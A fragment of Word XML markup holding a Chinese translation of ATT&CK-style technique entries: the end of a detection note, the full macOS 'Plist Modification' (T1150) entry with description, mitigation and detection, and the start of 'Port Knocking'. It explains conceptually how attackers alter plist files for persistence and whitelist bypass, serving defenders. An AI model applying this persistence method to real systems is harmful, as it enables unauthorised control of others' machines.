        </w:rPr>
        <w:t>"findstr"</w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"net"</w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"python"</w:t>
      </w:r>
      <w:r w:rsidRPr="00187D3B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）。如果此活动发生在已知的管理活动、升级、安装或修补程序之外，则可能是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44C540" w14:textId="10119052" w:rsidR="000F2665" w:rsidRPr="0089594B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089594B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>不应孤立地查看数据和事件，而应将其视为可能导致其他活动的行为链的一部分，例如为</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="0089594B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>而建立的连接、通过发现了解环境的详细信息以及横向移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4FFC52" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008411D6" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008411D6">
        <w:t>Plist</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97301">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="535B099B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A8FA7FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> T1150</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="742C5259" w14:textId="699AB6DD" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御逃逸</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63601E6F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="797C7D22" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D98860" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F518AA4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>绕过的防御</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程白名单</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>按文件名或路径列出白名单</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66407F28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="668C649C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32FCA4B1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>属性列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>plist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> macOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>用于配置应用程序和服务的所有信息。这些文件是通过一系列键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>&lt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>包围的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>编码和格式化像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文档。它们详细说明程序何时应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>执行、可执行文件路径、程序参数、所需的操作系统权限以及其他许多权限。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">plists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>位于特定位置，具体取决于其用途，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>/Library/Preferences</w:t>
      </w:r>
      <w:r w:rsidRPr="00A74B9C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>以提升的权限执行）和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/Library/Preferences</w:t>
      </w:r>
      <w:r w:rsidRPr="00A74B9C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>使用用户的权限执行）。攻击者可以修改这些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> plist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件以指向自己的代码，可以使用它们在另一个用户的上下文中执行其代码，绕过白名单过程，甚至将它们用作持久性机制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2146E2FC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377E985E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3819"/>
        <w:gridCol w:w="5917"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="601B7496" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3819" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0EA8182E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5917" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="61B461DE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="2B13A0F8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="185490C3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制文件</w:t>
            </w:r>
            <w:r>
              <w:t>和目录权限</w:t>
            </w:r>
            <w:hyperlink r:id="rId66" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5917" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F423C63" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>使</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> plist </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>文件成为只读文件，防止用户修改这些文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B131F70" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A9E142" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006E4DB5" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件系统监视可以确定是否正在修改</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> plist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件。在大多数情况下，用户不应有权限</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>修改这些。某些软件工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>敲击</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）可以检测持久性机制，并指向正在引用的特定文件。这有助于查看实际执行的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B336516" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="006E4DB5" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>控</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>进程执行，查找由修改的</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> plist </w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件产生的异常进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>执行。监</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>控</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>用于修改</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> plist </w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件或将</w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> plist </w:t>
      </w:r>
      <w:r w:rsidRPr="006E4DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件作为参数的实用程序，这可能指示可疑活动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB9DB1B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97301">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口试探</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="6B8B9A39" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E1753AE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> T1205</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FF20EE1" w14:textId="2E34B6FB" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
